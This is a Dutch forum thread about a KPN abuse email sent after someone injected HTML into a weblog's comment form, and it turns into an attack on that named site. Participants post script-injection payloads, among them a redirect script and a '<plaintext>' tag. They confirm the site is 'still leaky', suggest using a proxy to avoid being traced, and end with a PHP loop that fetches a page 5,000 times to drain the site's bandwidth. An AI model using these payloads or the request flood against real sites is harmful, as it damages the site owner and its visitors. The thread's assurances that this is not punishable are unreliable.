Abuse KPN

Ooi...

Een vriend van mij heeft een abuse-email van KPN ontvangen, over dat hij HTML-Tag's had ingevoerd op een site. De site was niet tegen HTML beveiligd en gaf daardoor een error.

Mijn vraag: kan die vriend daar problemen mee krijgen? En is dat strafbaar? Hij heeft er wel een abuse-email van KPN van gekregen...
En wat zou er nu gebeuren?

Thnx

Zolang hij er geen misbruik van maakt en het "uittest" en gewoon netjes meldt lijkt het me niet dat hij er gekloot mee kan krijgen. Welke site trouwens? En wordt hij gehost via zo'n gratis kpn hosting shit? En hoe kwamen ze erachter enzo. Want als iemand mijn site zou exploiten zou ik toch wel mailtje sturen naar provider.

hurktoilet.nl (??)
alleen maar wat html-tag's invoeren.

Is niet strafbaar.
Mja had ie maar een proxy moeten gebruiken ofzo

Saven schreef:

Is niet strafbaar.
Mja had ie maar een proxy moeten gebruiken ofzo

Mooi

was idd slimmer geweest

Ik kan daar geen exploit op vinden?
Saven noem eens pwnage iets wat je kan invoeren daar

Gewoon dit: <script>

en dan laadt het formulier niet meer (van een blog).
Ik durf niet te testen of het gefixt is, wil geen problemen

Hier is zo'n link naar zo'n kut"blog": blog

Volgens mij is gewoon valse abuse e-mail?

zit op ipod doe zo wel ff via proxy

Die mail is waarschijnlijk gewoon fake
Post 'm hier anders.

hangt er wel een beetje vanaf wat je invoert, testen of een echte hack poging?

Volgensmij hebben ze hem offline gehaald

Het is nog steeds lek

<plaintext> is ook altijd wel leuk.
Maar volgens mij is dat mailt je fake.. zo gauw sturen ze niet van die mails geloof ik

Suma

haha

@ Saven:
het is:

<script>document.location.href='http://site.nl';</script>

De e-mail is echt, zijn vader had de e-mail ontvangen op een @planet.nl e-mailadres. Zijn e-mail was nergens ingevoerd.

Joris schreef:

haha

@ Saven:
het is:

<script>document.location.href='http://site.nl';</script>;

De e-mail is echt, zijn vader had de e-mail ontvangen op een @planet.nl e-mailadres. Zijn e-mail was nergens ingevoerd.

Je hoeft er niet veel van aan te trekken denk ik.. Die persoon doet niks fout.

Post eens een kopieetje van zo'n email

haha

E-mail kunnen we niet opzoeken (weten wachtwoord laptop v/d vader niet).

Joris schreef:

haha

E-mail kunnen we niet opzoeken (weten wachtwoord laptop v/d vader niet).

oke, ik zal het na vragen

[url]http://www.hurktoilet.nl/weblog/wreageer.php?id=2912&stuurdoor=nee[/url] power of plaintext

haha mooizo

oh oke da's ook mooi

Ik laat nu de file_get_contents() van de site while'n, de server slaat geen cache op dus het kost lekker veel dataverkeer xD

<?php
$i = 0;
$aantal = 5000;

while ($aantal>$i) {
    file_get_contents("http://www.hurktoilet.nl/weblog/wreageer.php?id=2912&stuurdoor=nee");
    $i++;
}

echo "lollollol";

?>